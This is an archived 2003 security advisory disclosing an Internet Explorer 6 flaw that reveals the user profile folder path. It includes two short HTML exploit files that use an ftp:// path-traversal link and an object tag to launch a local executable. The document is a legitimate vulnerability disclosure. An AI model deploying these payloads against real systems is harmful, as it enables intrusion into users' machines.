Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability

From: Eiji James Yoshida (ptrs-ejyat_private)
Date: Thu Jun 05 2003 - 05:14:11 PDT

Next message: advisoriesat_private: "AdSubtract Proxy ACL Bypass Vulnerability"

Previous message: KF: "SRT2003-06-05-0935 - HPUX ftpd remote issue via REST"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Title:
~~~~~~~~~~~~~~~~~
Microsoft Internet Explorer %USERPROFILE% Folder Disclosure Vulnerability
[http://www.geocities.co.jp/SiliconValley/1667/advisory07e.html]


Date:
~~~~~~~~~~~~~~~~~
5 June 2003


Author:
~~~~~~~~~~~~~~~~~
Eiji James Yoshida [ptrs-ejyat_private]


Vulnerable:
~~~~~~~~~~~~~~~~~
Windows2000 SP3 Internet Explorer 6.0 SP1


Overview:
~~~~~~~~~~~~~~~~~
A remote attacker is able to gain access to the path of the %USERPROFILE% folder
without guessing a target user name by this vulnerability.

ex.) %USERPROFILE% = "C:\Documents and Settings\victim"


Details:
~~~~~~~~~~~~~~~~~
This vulnerability is in the address of a "Cannot find server" page.
The address of a "Cannot find server" page is
"res://C:\WINNT\System32\shdoclc.dll/dnserror.htm#file://C:\Documents and
Settings\%USERNAME%\Desktop\ftp:\\%@\".


Exploit code:
~~~~~~~~~~~~~~~~~
**************************************************
This exploit reads %TEMP%\exploit.html.
You need to create it.
And click on the "Exploit" link on the ftpexp.html.
**************************************************

[exploit.html]
<html>
<script>setTimeout(function(){document.body.innerHTML='<object classid="clsid:11111111-1111-1111-1111-111111111111"
codebase="file://c:/winnt/notepad.exe"></object>'}, 0);</script>
</html>

[ftpexp.html]
<html>
<a href="ftp://%@/../../../../Local Settings/Temp/exploit.html" TYPE="text/html" target="_blank">Exploit</a>
</html>


Workaround:
~~~~~~~~~~~~~~~~~
None.


Vendor Status:
~~~~~~~~~~~~~~~~~
Microsoft was notified on 7 November 2002.
A patch will be released to fix this bug in the future.


- ------------------------------------------------------
Eiji "James" Yoshida
penetration technique research site
E-mail: ptrs-ejyat_private
URL: http://www.geocities.co.jp/SiliconValley/1667/index.htm
- ------------------------------------------------------

-----BEGIN PGP SIGNATURE-----
Version: PGP 6.5.8ckt
Comment: Eiji James Yoshida

iQA/AwUBPt8y+vfWv13kjJq0EQJ+tgCeKwVv/+MtKD2zGtp29pjwlDR119MAoJOk
ABdf8AVY3NtdcBgzsS7VHm+J
=52pX
-----END PGP SIGNATURE-----

Next message: advisoriesat_private: "AdSubtract Proxy ACL Bypass Vulnerability"
Previous message: KF: "SRT2003-06-05-0935 - HPUX ftpd remote issue via REST"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jun 05 2003 - 09:19:20 PDT